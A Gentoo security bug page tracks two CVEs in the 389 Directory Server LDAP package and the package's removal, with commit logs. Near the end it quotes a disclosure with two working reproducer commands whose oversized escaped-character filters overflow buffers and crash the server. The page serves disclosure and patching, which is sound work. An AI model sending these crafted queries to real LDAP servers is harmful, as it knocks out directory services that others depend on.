| Summary: | net-nds/389-ds-base: Multiple vulnerabilities (CVE-2018-1089,CVE-2019-3883) | ||
|---|---|---|---|
| Product: | Gentoo Security | Reporter: | Agostino Sarubbo <ago> |
| Component: | Vulnerabilities | Assignee: | Gentoo Security <security> |
| Status: | RESOLVED FIXED | ||
| Severity: | trivial | CC: | jstein, maintainer-needed, treecleaner, wes, wibrown |
| Priority: | Normal | Keywords: | PullRequest |
| Version: | unspecified | ||
| Hardware: | All | ||
| OS: | Linux | ||
| URL: | http://www.openwall.com/lists/oss-security/2018/05/07/2 | ||
| See Also: |
https://bugs.gentoo.org/show_bug.cgi?id=701812 https://github.com/gentoo/gentoo/pull/15907 |
||
| Whiteboard: | ~3 [noglsa upstream/ebuild cve] | ||
| Package list: | Runtime testing required: | --- | |
| Bug Depends on: | 731296 | ||
| Bug Blocks: | |||
the package has no maintainer any more. CVE-2019-3883 (https://nvd.nist.gov/vuln/detail/CVE-2019-3883): In 389-ds-base up to version 1.4.1.2, requests are handled by workers threads. Each sockets will be waited by the worker for at most 'ioblocktimeout' seconds. However this timeout applies only for un-encrypted requests. Connections using SSL/TLS are not taking this timeout into account during reads, and may hang longer.An unauthenticated attacker could repeatedly create hanging LDAP requests to hang all the workers, resulting in a Denial of Service. The bug has been referenced in the following commit(s): https://gitweb.gentoo.org/repo/gentoo.git/commit/?id=66a48ca5d52d4699c4ef38209dfcad8ebdd149aa commit 66a48ca5d52d4699c4ef38209dfcad8ebdd149aa Author: Sam James (sam_c) <sam@cmpct.info> AuthorDate: 2020-06-04 18:24:47 +0000 Commit: Thomas Deutschmann <whissi@gentoo.org> CommitDate: 2020-06-04 19:14:36 +0000 net-nds/389-ds-base, dev-libs/389-adminutil: Last rites Bug: https://bugs.gentoo.org/655176 Bug: https://bugs.gentoo.org/701812 Signed-off-by: Sam James (sam_c) <sam@cmpct.info> Signed-off-by: Thomas Deutschmann <whissi@gentoo.org> profiles/package.mask | 10 ++++++++-- 1 file changed, 8 insertions(+), 2 deletions(-) The bug has been referenced in the following commit(s): https://gitweb.gentoo.org/repo/gentoo.git/commit/?id=7414f8c33bb75cd9a4f6a61040886852fcf2afe1 commit 7414f8c33bb75cd9a4f6a61040886852fcf2afe1 Author: Michał Górny <mgorny@gentoo.org> AuthorDate: 2020-07-13 04:52:07 +0000 Commit: Michał Górny <mgorny@gentoo.org> CommitDate: 2020-07-13 04:52:31 +0000 dev-libs/svrcore: Remove last-rited pkg Bug: https://bugs.gentoo.org/655176 Bug: https://bugs.gentoo.org/701812 Signed-off-by: Michał Górny <mgorny@gentoo.org> dev-libs/svrcore/Manifest | 2 - dev-libs/svrcore/files/svrcore-4.0.4-gentoo.patch | 100 ---------------------- dev-libs/svrcore/files/svrcore-4.1-gentoo.patch | 100 ---------------------- dev-libs/svrcore/metadata.xml | 5 -- dev-libs/svrcore/svrcore-4.0.4-r1.ebuild | 40 --------- dev-libs/svrcore/svrcore-4.1.2.ebuild | 35 -------- profiles/package.mask | 6 -- 7 files changed, 288 deletions(-) https://gitweb.gentoo.org/repo/gentoo.git/commit/?id=aef3f76fb5607ea9fcecd97c192a0ab06d224737 commit aef3f76fb5607ea9fcecd97c192a0ab06d224737 Author: Michał Górny <mgorny@gentoo.org> AuthorDate: 2020-07-13 04:51:55 +0000 Commit: Michał Górny <mgorny@gentoo.org> CommitDate: 2020-07-13 04:52:27 +0000 dev-libs/389-adminutil: Remove last-rited pkg Bug: https://bugs.gentoo.org/655176 Bug: https://bugs.gentoo.org/701812 Signed-off-by: Michał Górny <mgorny@gentoo.org> dev-libs/389-adminutil/389-adminutil-1.1.15.ebuild | 46 ---------------------- dev-libs/389-adminutil/Manifest | 1 - dev-libs/389-adminutil/metadata.xml | 5 --- profiles/package.mask | 2 - 4 files changed, 54 deletions(-) https://gitweb.gentoo.org/repo/gentoo.git/commit/?id=eb6602276b3003bcdafd619a28ac6f163f52fb30 commit eb6602276b3003bcdafd619a28ac6f163f52fb30 Author: Michał Górny <mgorny@gentoo.org> AuthorDate: 2020-07-13 04:50:40 +0000 Commit: Michał Górny <mgorny@gentoo.org> CommitDate: 2020-07-13 04:52:23 +0000 net-nds/389-ds-base: Remove last-rited pkg Bug: https://bugs.gentoo.org/655176 Bug: https://bugs.gentoo.org/701812 Signed-off-by: Michał Górny <mgorny@gentoo.org> net-nds/389-ds-base/389-ds-base-1.3.6.8-r1.ebuild | 126 ------- net-nds/389-ds-base/389-ds-base-9999.ebuild | 133 -------- net-nds/389-ds-base/Manifest | 1 - ...-base-1.3.6-backport-invalid-password-mig.patch | 376 --------------------- net-nds/389-ds-base/files/389-ds-snmp.initd | 44 --- net-nds/389-ds-base/files/389-ds.initd-r1 | 90 ----- net-nds/389-ds-base/metadata.xml | 23 -- 7 files changed, 793 deletions(-) ~ package so noglsa, closing. |
From ${URL} : This is to disclose the following flaw, CVE-2018-1089 : 389-ds-base, a.k.a 389 Directory Server, https://pagure.io/389-ds-base/, is a highly usable, fully featured, reliable and secure LDAP server implementation. It handles many of the largest LDAP deployments in the world. 389-ds server did not properly handle characters needed to be escaped in its query filter. This could result in buffer overflows, from the heap or the stack, on larger filters. An unauthenticated attacker could send a specially crafted LDAP request and crash the server. RCE has not been demonstrated at this time. Red Hat would like to thank Greg Kubok for alerting us of the issue. Reproducer1 : [root@server1 ~]# payload=$(printf '.*$%.0s' {1..1000}) [root@server1 ~]# ldapsearch -h localhost -p 389 -x -b "dc=blah" "(&(|(telephoneNumber=*${payload}*)(uid=*${payload}*)(title=*${payload}*)(sn=*${payload}*)(ou=*${payload}*)(givenName=*${payload}*))(objectClass=posixaccount))" "telephoneNumber sshpubkeyfp ipaSshPubKey uid krbCanonicalName title loginShell uidNumber gidNumber sn homeDirectory mail krbPrincipalName givenName nsAccountLock" Reproducer2: [root@server1 ~]# perl -e 'print ".*\$" x (1400)' | ldapsearch -x -f- "(&(uid=%s)(objectClass=posixaccount))" @maintainer(s): since the package or the affected version has never been marked as stable, we don't need to stabilize it. After the bump, please remove the affected versions from the tree.